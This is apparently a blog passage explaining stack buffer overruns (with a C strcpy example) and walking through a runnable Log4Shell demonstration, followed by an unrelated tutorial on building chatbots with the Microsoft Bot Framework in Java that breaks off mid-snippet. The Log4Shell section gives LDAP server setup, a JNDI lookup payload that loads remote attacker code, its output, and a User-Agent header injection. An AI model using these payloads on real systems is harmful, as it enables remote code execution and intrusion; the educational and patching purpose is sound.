For the type of buffer overrun we’ll dig into, it’s important to understand how a “call stack” works. Programs are built out of “functions” which are small bits of code that each do a particular thing. Functions are given space to store their stuff (local variables) and can call other functions that help them accomplish their purpose. For example, a “stringCopy” function might call a “stringLength” function to figure out how many characters need to be moved. This chain of functions is managed using a data structure called a “call stack” and some magic pointers called “registers”. The stack when function1 is running looks something like this:

The red and green bits make up the “stack frame” for the currently-running function (i.e., function1). The RBP register (in x64 systems) always points to the current stack frame. The first thing in the frame (the red part) is a pointer to the frame for the previous function (not shown) that called function1. The other stuff in the frame (the green part) is where function1’s local variables are stored.

When function1 calls out to function2, a few things happen:

  1. The address of the next instruction in function1 is pushed onto the top of the stack (blue below). This is where execution will resume in function1 after function2 completes.
  2. The current value of RBP is pushed onto the top of the stack (red above blue below).
  3. The RBP register is set to point at this new location on the stack. This “chain” from RBP to RBP lets the system quickly restore things for function1 when function2 completes.
  4. The RSP register is set to point just beyond the amount of space required for function2’s local variables. This is just housekeeping so we know where to do this dance again in case function2 also makes function calls.
  5. Execution starts at the beginning of function2.

I left out some things there, like the way parameters are passed to functions, but it’s good enough. At this point our stack looks like this:

Now, let’s assume that function2 looks something like this (in C, because buffer overruns usually happen in languages like C that have fewer guard rails):

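#include <string.h>

void function2(char *input) {
    char buffer[10];        /* room for 9 characters plus the terminating null */
    strcpy(buffer, input);  /* copies until the null terminator, with no length check */
    /* do something with buffer */
    return;
}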

If the input string is less than 10 characters (9 + a terminating null), everything is fine. But what happens if input is longer than this? The strcpy function happily copies over characters until it finds the null terminator, so it will just keep on copying past the space allocated for buffer and destroy anything beyond that in the stack — writing over the saved RBP value, over the return address, maybe even into the local variables further down:

Typically a bug like this just crashes the program, because when function2 returns to its caller, the return address it uses (again in blue, now overwritten by yellow) is now garbage and almost certainly doesn’t point at legitimate code. Back in the good old days before hackers got creative, that was the end of it. A bummer, something to fix, but not a huge deal.
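Since we are not building a real exploit here, a toy simulation may help make the overwrite concrete. The sketch below uses a plain byte array to stand in for function2’s stack frame: 10 bytes of buffer, then 8 bytes of saved RBP, then 8 bytes of return address. Everything in it (the class, the layout constants, the marker bytes) is made up for illustration; real frames have padding and alignment that I am ignoring, and Java itself would never let this happen to its own stack.

```java
import java.nio.charset.StandardCharsets;
import java.util.Arrays;

// Hypothetical simulation: a byte array stands in for function2's stack frame.
class StackSmashSketch {

    static final int BUFFER_SIZE = 10;   // char buffer[10]
    static final int SAVED_RBP_AT = 10;  // next 8 bytes: saved frame pointer (red)
    static final int RETURN_AT = 18;     // next 8 bytes: return address (blue)
    static final int FRAME_SIZE = 26;

    // Builds a frame with an empty buffer and recognizable marker bytes after it.
    static byte[] newFrame() {
        byte[] frame = new byte[FRAME_SIZE];
        Arrays.fill(frame, SAVED_RBP_AT, RETURN_AT, (byte) 0xBB);
        Arrays.fill(frame, RETURN_AT, FRAME_SIZE, (byte) 0xAA);
        return frame;
    }

    // Mimics strcpy: copies the whole input with no check against BUFFER_SIZE.
    // (It stops at the end of the frame only so the simulation itself stays in bounds.)
    static void uncheckedCopy(byte[] frame, String input) {
        byte[] src = input.getBytes(StandardCharsets.US_ASCII);
        for (int i = 0; i < src.length && i < frame.length; i++) {
            frame[i] = src[i];
        }
    }

    // True if the 8 return-address bytes still hold their original marker value.
    static boolean returnAddressIntact(byte[] frame) {
        for (int i = RETURN_AT; i < FRAME_SIZE; i++) {
            if (frame[i] != (byte) 0xAA) return false;
        }
        return true;
    }

    public static void main(String[] args) {
        byte[] ok = newFrame();
        uncheckedCopy(ok, "short");
        System.out.println("short input, return address intact: " + returnAddressIntact(ok));

        byte[] smashed = newFrame();
        uncheckedCopy(smashed, "AAAAAAAAAAAAAAAAAAAAAAAAAA"); // 26 bytes, far more than 10
        System.out.println("long input, return address intact: " + returnAddressIntact(smashed));
    }
}
```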

But it turns out that if you know a bug like this exists, you can (carefully) construct an input string that can do very bad things indeed. Your malicious input data must have two special properties:

First, it needs to contain “shellcode” — hacker jargon for a sequence of bytes that is actually code (more specifically, opcodes for the targeted platform) that does your dirty work. Shellcode needs to be pretty small, so usually it just “bootstraps” the real hack. For example, common shellcode downloads and runs a much larger code package from a well-known network server owned by the hacker. The really tricky thing about building shellcode is that it can’t contain any null bytes, because it has to be a valid C string. Most hackers just reuse shellcode that somebody else wrote, which honestly seems less than sporting.

Second, it needs to be constructed so that the bytes that overwrite the return address (blue) point to the shellcode. When function2 completes, the system will dutifully start executing the code pointed to by this location. Doing this was traditionally feasible because the bottom of the stack always starts at a fixed, known address. It follows that whenever function2 is called in a particular context, the value of RBP should be the same as well. So theoretically you could build a fixed input string that looks like the yellow here:

p0wnd! So now we’re hackers, right? Well, not quite. First, finding that fixed address is quite complicated. I won’t go any further down that rabbit hole except to say that whoever figured out NOP sleds was brilliant. But much worse for our visions of world domination, today’s operating systems pick a random starting address for the stack each time a process runs, rendering all that work to figure out the magic address useless. For that matter, C compilers now are much better about adding code to detect overruns before they can do damage anyways, so we may not even have gotten that far. But still, pretty cool.

3. The Latest One (Log4Shell)

Last mile folks, I promise — and I hope you’re still with me, because this last hack is a fun one and it’s easy to run yourself. Tons and tons and tons of apps were vulnerable to Log4Shell when it burst onto the scene just a few months ago. This is kind of sad, because it means that we’re all running some pretty old code. But I guess that’s the way the world works, and why there is still a market for COBOL and FORTRAN developers.

It all starts with “logging.” Software systems can be pretty complicated, so it’s useful to have some kind of trail that helps you see what is (or was) happening inside them. There are a few ways of doing this, but the old standby is simply logging — adding code to the system that writes out status messages along the way. This is particularly useful when you’re trying to understand systems in production — e.g., when a user calls and says “I tried to upload a file this morning and it crashed,” reviewing the log history from the time when this happened might give you some insight into what really went wrong.

This seems pretty straightforward, and in fact the JDK natively supports a pretty serviceable set of logging APIs. But of course things never stay simple:

  • Adding logs has a performance impact, so we’d like a way to turn them on or off at runtime, both in terms of the severity of the message (e.g., the difference between very verbose debugging logs and critical error information) and where it comes from (e.g., you might want to turn on logs for just outbound HTTP messages).
  • It’d be nice to control where the log data is saved — a file, a database, a service like Sumo Logic (there is a whole industry around this), whatever.
  • Logs can get pretty big so some kind of rotation or archive strategy would be helpful.
  • The native stuff is slow in some cases, and configuration is unwieldy, and so on.
  • Developers just really like writing developer tools (me too).

A bunch of libraries sprang up to address these gaps, and especially with the advent of dependency-management tools like Maven, the Apache Log4j project quickly became basically ubiquitous in Java applications. As a rule I try to avoid dependencies, but there are some good reasons to accept this one. So it’s everywhere. Like, everywhere. And because it’s used so commonly and serves so many scenarios, Log4j has grown into quite a beast; most folks use a tiny fraction of its features. And that’s kind of fine, except when it’s not.

OK. This one is pretty satisfying to run yourself. First, clone and build the hack app I described in the SQL Injection section earlier. The app includes an old Log4j version that contains the vulnerability, and lets you play with various log messages like this (I’ll explain the trustURLCodebase thing in a bit):

$ java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true \
    -cp target/hack-1.0-SNAPSHOT-jar-with-dependencies.jar com.shutdownhook.hack.App \
    log 'yo dawg'
11:35:25.029 [main] ERROR com.shutdownhook.hack.Logs - yo dawg

The app uses the default Log4j configuration that adds a timestamp and some other metadata to the message and outputs to the console. Pretty simple so far. Now, one of those features in Log4j is the ability to add specially-formatted tokens in a message that include dynamic data in the output. So for example:

$ java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true \
    -cp target/hack-1.0-SNAPSHOT-jar-with-dependencies.jar com.shutdownhook.hack.App \
    log 'user = ${env:USER}, java = ${java:version}'
11:42:31.358 [main] ERROR com.shutdownhook.hack.Logs - user = sean, java = Java version 11.0.13

The first token there looks up the environment variable “USER” and inserts the value found (sean). The second one inserts the currently-running Java version. Kind of cool. There are a bunch of different lookup types, and you can add your own too.
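To get a feel for what a lookup does, here is a toy interpolator that finds ${prefix:key} tokens in a message and swaps in a value from a handler registered for that prefix. It is only a sketch of the idea: the class, the regex and the handler map are my own inventions, and Log4j’s real lookup machinery is far more elaborate. The thing to notice is that the message text is being treated as instructions, not just data.

```java
import java.util.HashMap;
import java.util.Map;
import java.util.function.Function;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Hypothetical toy interpolator; not how Log4j is actually implemented.
class LookupSketch {

    // Matches tokens of the form ${prefix:key}
    private static final Pattern TOKEN = Pattern.compile("\\$\\{(\\w+):([^}]+)\\}");

    // Replaces each token by calling the handler registered for its prefix.
    // Tokens with an unknown prefix are left in the message untouched.
    static String interpolate(String message, Map<String, Function<String, String>> lookups) {
        Matcher m = TOKEN.matcher(message);
        StringBuilder out = new StringBuilder();
        while (m.find()) {
            Function<String, String> handler = lookups.get(m.group(1));
            String value = (handler == null)
                ? m.group()
                : String.valueOf(handler.apply(m.group(2)));
            m.appendReplacement(out, Matcher.quoteReplacement(value));
        }
        m.appendTail(out);
        return out.toString();
    }

    public static void main(String[] args) {
        Map<String, Function<String, String>> lookups = new HashMap<>();
        lookups.put("env", System::getenv);        // environment variables
        lookups.put("sys", System::getProperty);   // JVM system properties
        System.out.println(
            interpolate("user = ${env:USER}, java = ${sys:java.version}", lookups));
    }
}
```

Adding a new lookup type is just one more entry in the map, which is convenient right up until one of those entries can reach out to the network.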

If you’re guessing that the source of our hack might be in a lookup, you nailed it. The “JNDI” lookup dynamically loads objects by name from a local or remote directory service. This kind of thing is common in enterprise Java applications — serialized objects are pushed across network wires and reconstituted in other processes. There are a few flavors of how a JNDI lookup can work, but this one in particular works well for our hack:

  • The JNDI lookup references an object stored in a remote LDAP directory server.
  • The entry in LDAP indicates that the object is a “javaNamingReference;” that the class and factory name is “Attack;” and that the code for these objects can be found at a particular URL.
  • Log4j downloads the code from that URL, instantiates the factory object, calls its “getObjectInstance” method, and calls “toString” on the returned object.
  • Boom! Because the code can be downloaded from any URL, if an attacker can trick you into logging a message of their choosing, they can quite easily bootstrap their way into your process. Their toString method can do basically anything it wants.
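The steps above hinge on a standard JNDI interface, javax.naming.spi.ObjectFactory. Here is a deliberately harmless sketch of what a class of that shape looks like. It is not the Attack.java from the repo; the class name and the payloadRan flag are hypothetical, and the “payload” does nothing but flip a boolean. (A factory that JNDI actually loads would also need to be a public class, which this one intentionally is not.)

```java
import java.util.Hashtable;
import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;

// Hypothetical, harmless stand-in for an attacker-supplied factory class.
class FactorySketch implements ObjectFactory {

    // Set when toString() runs, so we can observe that the "payload" executed.
    static boolean payloadRan = false;

    // JNDI calls this method on the factory named by the directory entry.
    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx,
                                    Hashtable<?, ?> environment) {
        return new Object() {
            // Whatever lives here runs inside the victim's process when the
            // logger converts the looked-up object to text.
            @Override
            public String toString() {
                payloadRan = true;
                return "nothing to see here";
            }
        };
    }

    public static void main(String[] args) {
        Object result = new FactorySketch().getObjectInstance(null, null, null, null);
        System.out.println(result);  // string conversion triggers the payload
        System.out.println("payload ran: " + payloadRan);
    }
}
```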

This is way more impressive when you see it in action. To do that, you’ll need an LDAP server to host the poisoned directory entry. The simplest way I’ve found to do this is by downloading the UnboundID LDAP SDK for Java, which comes with a command-line tool called in-memory-directory-server. Assuming you are still in the “hack” directory where you built the code for this article, this command will put you in business:

PATH_TO_UNBOUNDID_SDK/tools/in-memory-directory-server \
    --baseDN "o=JNDIHack" --port 1234 --ldifFile attack/attack.ldif

You also need an HTTP server hosting the Attack.class binary. In order to keep things simple, I’ve posted a version up on Azure and set javaCodeBase in attack.ldif to point there. Generally though, you shouldn’t be running binaries that are sitting randomly out on the net, even when they were put there by somebody as upstanding and trustworthy as myself. If you want to avoid that, just compile Attack.java with “javac Attack.java,” put the resulting class file up on any web server you control, and update line 13 in attack.ldif to point there instead.

With the attacker-controlled LDAP and HTTP servers running, execute the hack app with an embedded JNDI lookup in the message:

$ java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true \
    -cp target/hack-1.0-SNAPSHOT-jar-with-dependencies.jar com.shutdownhook.hack.App \
    log '${jndi:ldap://127.0.0.1:1234/cn%3dAttack%2cou%3dObjects%2co%3dJNDIHack}'
12:22:25.857 [main] ERROR com.shutdownhook.hack.Logs - nothing to see here

And now the kicker:

$ ls -l /tmp/L33T*
-rw------- 1 sean sean 0 Apr  7 12:22 /tmp/L33T-15518763719698030164-shutdownhook

Dang son, now that’s a hack. Simply by logging a completely legit data string, I can force any code from anywhere on the Internet to run in your JVM. The code that returned “nothing to see here” and created a file in your /tmp directory lives right here. Remember that the code runs with full privileges to the process and can do anything it wants. And unlike shellcode, it doesn’t even have to be clever. Yikes.

One caveat: we’re definitely cheating by setting the parameter com.sun.jndi.ldap.object.trustURLCodebase to true. For a long time now (specifically since version 8u191) Java has disabled this behavior by default. So folks running new versions of Java generally weren’t vulnerable to this exact version of the exploit. Unfortunately, it still works for locally sourced classes, and hackers were able to find some commonly-available code that they could trick into bad behavior too. The best description of this that I’ve seen is in the “Exploiting JNDI injections in JDK 1.8.0_191+” section of this article.

But wait a second, there’s one more problem. In my demonstration, we chose the string that gets logged! This doesn’t seem fair either — log messages are created by the application developer, not the end user, so how did the Bad Guys cause those poisoned logs to be sent to Log4j in the first place? This brings us right back to the overarching theme: most effective hacks come from code hiding in input data, and sometimes those input channels aren’t completely obvious.

For example, when your web browser makes a request to a web server, it silently includes a “header” value named “User-Agent” that identifies the browser type and version. Even today, many website bugs are caused by incompatibilities from browser to browser, so web servers almost always log this User-Agent value for debugging purposes. But anyone can make a web request, and they can set the User-Agent field to anything they like.

Smells like disaster for the Good Guys. If we send a User-Agent header like “MyBrowser ${jndi:ldap://127.0.0.1:1234/cn%3dAttack%2cou%3dObjects%2co%3dJNDIHack}”, that string will very very likely be logged, which will kick off the exact remote class loading issue we demonstrated before. And with just a little understanding of how web servers work, you can come up with a ton of other places that will land your poisoned message into logging output. Bummer dude.

And, scene.

That’s probably enough of this for now. Two takeaways:

  1. For the love of Pete — control your dependencies, have a patching strategy and hire a white hat company to do a penetration test of your network. Don’t think you’re too small to be a target; everyone is a target.
  2. There is just something incredibly compelling about a good hack — figuring out how to make a machine do something it wasn’t designed to do is, plain and simple, good fun. And it will make you a better engineer too. Just don’t give in to the dark side.

As always, feel free to ping me if you have any trouble with the code, find a bug or just have something interesting to say — would love to hear it. Until next time!

Ground-Up with the Bot Framework

It seems I can’t write about code these days without a warmup rant. So feel free to jump directly to the next section if you like. But where’s the fun in that?

My mixed (ok negative) feelings about “quickstarts” go back all the way to the invention of “Wizards” at Microsoft in the early 1990s. They serve a worthy goal, guiding users through a complex process to deliver value quickly. But even in those earliest days, it was clear that the reality was little more than a cheap dopamine hit, mostly good for demos and maybe helping show what’s possible. The problem comes down to two (IMNSHO) fatal flaws:

First, quickstarts abandon users deep in the jungle with a great SUV but no map or driver’s license. Their whole reason to exist is to avoid annoying details and optionality, but that means that the user has no understanding of the context in which the solution was created. How do you change it? What dependencies does it require? How does it fit into your environment? Does it log somewhere? Is it secured appropriately for production? How much will it cost to run? The end result is that people constantly put hacked-up versions of “Hello World” into production and pay for it later when they have no idea what is really going on.

Second, they make developers even lazier than they naturally are anyways. Rather than start with the basics, quickstarts skip most of the hard stuff and lock in decisions that any serious user will have to make for themselves. If this was the start of the documentation, that’d be fine — but it’s usually the end. Instead of more context, the user just gets dropped unceremoniously into auto-generated references that don’t provide any useful narrative. Even worse, existence of the quickstart becomes an excuse for a sloppy underlying interface design (whether that’s an API or menus and dialogs) — e.g., why worry about the steering wheel if people take the test-drive using autopilot?

Anyways, this is really just a long-winded way to say that the Bot Framework quickstart is pretty useless, especially if you’re using Java. Let’s do better, shall we?

What is the Bot Framework?

There are a bunch of SDKs and builders out there for creating chatbots. The Microsoft Bot Framework has been around for a while (launched out of Microsoft Research in 2016) and seems to have pretty significant mindshare. Actually, the real momentum seems to be with no-code or low-code options, which makes sense given how many bots are shallow marketing plays. But I’m jumping right into the SDK here because that’s way more fun, and it’s my blog.

The framework is basically a big normalizer. Your bot presents a standardized HTTPS interface, using the Bot Framework SDK to help manage the various structures and state. The Azure Bot Service acts as a hub, translating messages in and out of various channels (Teams, Slack, SMS, etc.) and presenting them to your interface. Honestly, that’s basically the whole thing. There are additional services to support language understanding and speech-to-text and stuff like that, but it’s all additive to the basic framework.

WumpusBot and RadioBot

I introduced WumpusBot in my last post … basically a chatbot that lets you play a version of the classic 1970s game Hunt the Wumpus. The game logic is adapted from a simplified version online and lives in Wumpus.java, but I won’t spend much time on that. I’ve hooked WumpusBot up to Twilio SMS, so you can give it a try by texting “play” to 706-943-3865.

The project also contains RadioBot, a second chatbot that knows how to interact with the Shutdown Radio service I’ve talked about before. This one is hooked up to Microsoft Teams and includes some slightly fancier interactions — I’ll talk about that after we get a handle on the basics.

Build Housekeeping

All this is hosted in an Azure Function App — so let’s start there. The code is on github. You’ll need git, mvn and a JDK. Build like this:

git clone https://github.com/seanno/shutdownhook.git
cd shutdownhook/toolbox
mvn clean package install
cd ../radio/azure
mvn clean package

To run you’ll need two Cosmos Containers (details in Shutdown Radio on Azure, pay attention to the Managed Identity stuff) and a local.settings.json file with the keys COSMOS_ENDPOINT, COSMOS_DATABASE, COSMOS_CONTAINER and COSMOS_CONTAINER_WUMPUS. You should then be able to run locally using “mvn azure-functions:run.”

Getting a little ahead of myself, but to deploy to Azure you’ll need to update the “functionAppName” setting in pom.xml; “mvn azure-functions:deploy” should work from there assuming you’re logged into the Azure CLI.

The Endpoint

Your bot needs to expose an HTTPS endpoint that receives JSON messages via POST. The Java SDK would really like you to use Spring Boot for this, but it 100% isn’t required. I’ve used a standard Azure Function for mine; that code lives in Functions.java. It really is this simple:

  1. Deserialize the JSON in the request body into an Activity object (line 68).
  2. Pull out the “authorization” header (careful of case-sensitivity) sent by the Bot Framework (line 71).
  3. Get an instance of your “bot” (line 52). This is the message handler and derives from ActivityHandler in WumpusBot.java.
  4. Get an instance of your “adapter.” This is basically the framework engine; we inherit ours from BotFrameworkHttpAdapter in Adapter.java.
  5. Pass all the stuff from steps 1, 2 and 3 to the processIncomingActivity method of your Adapter (line 74).
  6. Use the returned InvokeResponse object to send an HTTPS status and JSON body back down the wire.

All of which is to say, “receive some JSON, do a thing, send back some JSON.” Wrapped up in a million annoying Futures.
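Stripped of the SDK, the shape of that flow looks something like the sketch below. To be clear, every type here is a hypothetical stand-in that I made up so the example runs on a bare JDK; none of them are the real Bot Framework classes, and the “auth check” is just a presence test where the real adapter validates the header properly.

```java
import java.util.concurrent.CompletableFuture;

// Hypothetical stand-ins for the SDK types, to show the request flow only.
class EndpointSketch {

    // Step 1 stand-in: the real code deserializes JSON into an Activity.
    static final class IncomingActivity {
        final String text;
        IncomingActivity(String text) { this.text = text; }
    }

    // Step 3 stand-in: the bot turns an activity into a reply, asynchronously.
    interface Bot {
        CompletableFuture<String> onTurn(IncomingActivity activity);
    }

    // Steps 4 and 5 stand-in: check the auth header, then hand off to the bot.
    static CompletableFuture<String> processIncomingActivity(
            String authHeader, IncomingActivity activity, Bot bot) {
        if (authHeader == null || authHeader.isEmpty()) {
            return CompletableFuture.completedFuture("{\"status\":401}");
        }
        return bot.onTurn(activity)
                  .thenApply(reply -> "{\"status\":200,\"text\":\"" + reply + "\"}");
    }

    public static void main(String[] args) {
        Bot echo = a -> CompletableFuture.completedFuture("you said: " + a.text);
        // Step 6: wait on the Future and send the result back down the wire.
        String response = processIncomingActivity(
            "Bearer xyz", new IncomingActivity("play"), echo).join();
        System.out.println(response);
    }
}
```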

The Adapter

The BotAdapter acts as ringmaster for the “do a thing” part of the request, providing helpers and context for your Bot implementation.

BotFrameworkHttpAdapter is almost sufficient to use as-is; the only reason I needed to extend it was to provide a custom Configuration object. By default, the object looks for configuration information in a properties file. This isn’t a bad assumption for Java apps, but in Azure Functions it’s way easier to keep configuration in the environment (via local.settings.json during development and the “Configuration” blade in the portal for production). EnvConfiguration in Adapter.java handles this, and then is wired up to our Adapter at line 34.

The adapter uses its configuration object to fetch the information used in service-to-service authentication. When we register our Bot with the Bot Service, we get an application id and secret. The incoming authentication header (#2 above) is compared to the “MicrosoftAppId” and “MicrosoftAppPassword” values in the configuration to ensure the connection is legitimate.

Actually, EnvConfiguration is more complicated than would normally be required, because I wanted to host two distinct bots within the same Function App (WumpusBot and RadioBot). This requires a way to keep multiple AppId and AppSecret values around, but we only have one System.getenv() to work with. The “configSuffix” noise in my class takes care of that segmentation.
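The suffix idea is simple enough to sketch in a few lines. This is an approximation of the approach and not the actual EnvConfiguration class: the class name, the fallback behavior and the variable names like MicrosoftAppId_WUMPUS are assumptions I picked for the example.

```java
import java.util.Map;

// Hypothetical sketch of suffix-based configuration; the real class may differ.
class SuffixConfigSketch {

    private final Map<String, String> env;
    private final String configSuffix;

    SuffixConfigSketch(Map<String, String> env, String configSuffix) {
        this.env = env;
        this.configSuffix = configSuffix;
    }

    // Looks up NAME + suffix first (e.g. MicrosoftAppId_WUMPUS), then falls back to NAME.
    String getProperty(String name) {
        String value = env.get(name + configSuffix);
        return (value != null) ? value : env.get(name);
    }

    public static void main(String[] args) {
        // In a Function App this map would be System.getenv().
        Map<String, String> env = Map.of(
            "MicrosoftAppId_WUMPUS", "wumpus-app-id",
            "MicrosoftAppId_RADIO", "radio-app-id");
        System.out.println(new SuffixConfigSketch(env, "_WUMPUS").getProperty("MicrosoftAppId"));
        System.out.println(new SuffixConfigSketch(env, "_RADIO").getProperty("MicrosoftAppId"));
    }
}
```

Each bot gets its own configuration object with its own suffix, so both can ask for the same property name and get different answers.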

There are a few other “providers” you can attach to your adapter if needed. The most common of these is the “AuthenticationProvider” that helps manage user-level OAuth, for example if you want your bot to access a user’s personal calendar or send email on their behalf. I didn’t have any need for this, so left the defaults alone.

Once you get all this wired up, you can pretty much ignore it.

The Bot

Here’s where the fun stuff starts. The Adapter sets up a TurnContext object and passes it to the onTurn method of your Bot implementation. The default onTurn handler is really just a big switch on the ActivityType (MESSAGE, TYPING, CONVERSATION_UPDATE, etc.) that farms out calls to type-specific handlers. Your bot can override any of these to receive notifications on various events.

The onMessageActivity method is called whenever your bot receives a (duh) message. For simple text interactions, simply call turnContext.getActivity().getText() to read the incoming text, and turnContext.sendActivity(MessageFactory.text(responseString)) to send back a response.

The Bot Framework has tried to standardize on markdown formatting for text messages, but support is spotty. For example Teams and WebChat work well, but Skype and SMS just display messages as raw text. Get used to running into this a lot — normalization across channels is pretty hit or miss, so for anything complex you can expect to be writing channel-specific code. This goes for conversation semantics as well. For example from my experience so far, the onMembersAdded activity:

  • Is called in Teams right away when the bot enters a channel or a new member joins;
  • Is called in WebChat only after the bot receives an initial message from the user; and
  • Is never called for Twilio SMS conversations at all.

Managing State

Quirks aside, for a stateless bot, that’s really about all there is to it. But not all bots are stateless — some of the most useful functionality emerges from a conversation that develops over time (even ELIZA needed a little bit of memory!) To accomplish that you’ll use the significantly over-engineered “BotState” mechanism you see in use at WumpusBot.java line 57. There are three types of state:

All of these are the same except for the implementation of getStorageKey, which grovels around in the turnContext to construct an appropriate key to identify the desired scope.
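As I understand the SDK, the scopes boil down to per-conversation, per-user, and per-user-within-a-conversation. The sketch below shows how a key for each might be assembled. Treat it as a rough approximation: the Turn class is a made-up stand-in for what the turnContext exposes, and the exact key formats are my assumption, not something copied from the framework.

```java
// Hypothetical sketch: how each state scope might derive its storage key.
class StorageKeySketch {

    // Stand-in for the identifying values available on the turn context.
    static final class Turn {
        final String channelId;
        final String conversationId;
        final String userId;

        Turn(String channelId, String conversationId, String userId) {
            this.channelId = channelId;
            this.conversationId = conversationId;
            this.userId = userId;
        }
    }

    // Shared by everyone in one conversation.
    static String conversationKey(Turn t) {
        return t.channelId + "/conversations/" + t.conversationId;
    }

    // Follows one user across conversations on a channel.
    static String userKey(Turn t) {
        return t.channelId + "/users/" + t.userId;
    }

    // One user within one conversation.
    static String privateConversationKey(Turn t) {
        return conversationKey(t) + "/users/" + t.userId;
    }

    public static void main(String[] args) {
        Turn t = new Turn("sms", "c42", "u7");
        System.out.println(conversationKey(t));
        System.out.println(userKey(t));
        System.out.println(privateConversationKey(t));
    }
}
```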

The state object delegates actual storage to an implementation of a CRUD interface. The framework implements two versions, one in-memory and one using Cosmos DB. The memory one is another example of why quickstarts are awful — it’s easy, but is basically never appropriate for the real world. It’s just a shortcut to make the framework look simpler than it really is.

The Cosmos DB implementation is fine except that it authenticates using a key. I wanted to use the same Managed Identity I used elsewhere in this app already, so I implemented my own in Storage.java. I cheated a little by ignoring “ETag” support to manage versioning conflicts, but I just couldn’t make myself believe that this was going to be a problem. (Fun fact: Cosmos lets you create items with illegal id values, but then you can’t ever read or delete them without some serious hackage. That’s why safeKey exists.)
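A key-sanitizing helper along these lines does the job. This is a sketch of the idea and not the safeKey in Storage.java: I am assuming the characters Cosmos rejects in an id are the forward slash, backslash, question mark and hash, and the star-plus-hex escaping scheme is simply one reasonable choice.

```java
// Hypothetical sketch of an id-escaping helper; not the safeKey from Storage.java.
class SafeKeySketch {

    // Assumed set of characters that Cosmos will not accept in an item id.
    private static final String ILLEGAL = "/\\?#";

    // Replaces each illegal character (and the escape character itself) with
    // '*' followed by its hex code, so distinct keys stay distinct.
    static String safeKey(String key) {
        StringBuilder sb = new StringBuilder();
        for (char c : key.toCharArray()) {
            if (ILLEGAL.indexOf(c) >= 0 || c == '*') {
                sb.append('*').append(Integer.toHexString(c));
            } else {
                sb.append(c);
            }
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        System.out.println(safeKey("sms/conversations/42"));
    }
}
```

Escaping the star as well keeps the mapping reversible, which matters if two raw keys would otherwise collapse into the same stored id.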

Last and very important if you’re implementing your own Storage — notice the call to enableDefaultTyping on the Jackson ObjectMapper. Without this setting, the ObjectMapper serializes to JSON without type information. This is often OK because you’re either providing the type directly or the OM can infer reasonably. But the framework’s state map is polymorphic (it holds Objects), so these mechanisms can’t do the job. Default typing stores type info in the JSON so you get back what you started with.

Once you have picked your scope and set up Storage, you can relatively easily fetch and store state objects (in my situation a WumpusState) with this pattern:

  1. Allocate a BotState object in your Bot singleton (line 39).
  2. Call getProperty in your activity handler to set up a named property (line 57).
  3. Fetch the state using the returned StatePropertyAccessor and (ugh) wait on the Future (lines 58-60). Notice the constructor here, which is used to initialize the object on first access.
  4. Use the object normally.
  5. Push changes back to storage before exiting your handler (line 68). Change tracking is implicit, so be sure to update state in the specific object instance you got in step #3. This is why Wumpus.newGame() never reallocates a WumpusState once it’s attached.
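The implicit change tracking in step 5 is easier to see in miniature. The sketch below is a toy stand-in written in plain Java, not the framework: TinyState, GameState and their members are all hypothetical names, and the "database" is just a string. It only illustrates why mutating the instance you were handed works while swapping in a fresh object silently does not.

```java
import java.util.concurrent.CompletableFuture;
import java.util.function.Supplier;

/** Toy model of implicit change tracking; every name here is hypothetical. */
final class ChangeTrackingSketch {

    /** Stand-in for a per-conversation game state object. */
    static final class GameState {
        int room = 1;
        int arrows = 5;
    }

    /** Stand-in for the state object plus its property accessor. */
    static final class TinyState {
        private GameState cached;   // the one instance handed out to the handler
        private String stored;      // pretend database row

        // First access builds the object with the supplied factory; later calls reuse it.
        CompletableFuture<GameState> get(Supplier<GameState> factory) {
            if (cached == null) {
                cached = factory.get();
            }
            return CompletableFuture.completedFuture(cached);
        }

        // "Saving" just snapshots whatever the cached instance looks like right now.
        CompletableFuture<Void> saveChanges() {
            if (cached != null) {
                stored = "room=" + cached.room + ",arrows=" + cached.arrows;
            }
            return CompletableFuture.completedFuture(null);
        }

        String stored() {
            return stored;
        }
    }

    public static void main(String[] args) {
        TinyState state = new TinyState();
        GameState game = state.get(GameState::new).join();

        game.room = 7;                 // mutate the tracked instance in place
        state.saveChanges().join();
        System.out.println(state.stored());

        game = new GameState();        // reallocating: the tracked instance is untouched
        game.room = 12;
        state.saveChanges().join();
        System.out.println(state.stored());
    }
}
```

The second save writes the same snapshot as the first, because the state object never saw the replacement instance.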

Testing your Bot Locally

Once you have your Function App running and responding to incoming messages, you can test it out locally using the Bot Framework Emulator. The Emulator is a GUI that can run under Windows, Mac or Linux (in X). You provide your bot’s endpoint URL (e.g., http://localhost:7071/wumpus for the WumpusBot running locally with mvn azure-functions:run) and the app establishes a conversation that includes a bunch of nifty debugging information.

Connecting to the Bot Service

The emulator is nice because you can manage things completely locally. Testing with the real Bot Service gets a little more complicated, because it needs to reach your bot at an Internet-accessible endpoint.

All of the docs and tutorials have you do this by running yet another random tool. ngrok is admittedly kind of cute: it basically just forwards a port from your local machine to a random URL like https://92832de0.ngrok.io. The fact that it can serve up HTTPS is a nice bonus. So if you’re down for that, by all means go for it. But I was able to do most of my testing with the emulator, so by the time I wanted to see it live, I really just wanted to see it live. Deploying the function to Azure is easy and relatively quick, so I just did that and ended up with my real bot URL: https://shutdownradio.azurewebsites.net/wumpus.

The first step is to create the Bot in Azure. Search the portal for “Azure Bot” (it shows up in the Marketplace section). Give your bot a unique handle (I used “wumpus”) and pick your desired subscription and resource group (fair warning: most of this can be covered under your free subscription plan, but you might want to poke around to be sure you know what you’re getting into). Java bots can only be “Multi Tenant” so choose that option and let the system create a new App ID.

Once creation is complete, paste your bot URL into the “Messaging Endpoint” box. Next, copy down the “Microsoft App Id” value and click “Manage” and then “Certificates & secrets.” Allocate a new client secret since you can’t see the value of the one they created for you (doh). Back in the “Configuration” section of your Function App, add these values (remember my comment about “configSuffix” at the beginning of all this):

  • MicrosoftAppId_wumpus (your app id)
  • MicrosoftAppSecret_wumpus (your app secret)
  • MicrosoftAppType_wumpus (“MultiTenant” with no space)

If you want to run RadioBot as well, repeat all of this for a new bot using the endpoint /bot and without the “_wumpus” suffixes in the configuration values.
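How a suffix keeps two bots' settings apart inside one Function App can be sketched in a few lines. This is a guess at the shape of the idea, not the code behind “configSuffix”: the SuffixedSettings class is hypothetical, and the sample values are placeholders. In a deployed Function App you would pass System.getenv() instead of the sample map, since app settings surface as environment variables.

```java
import java.util.Map;

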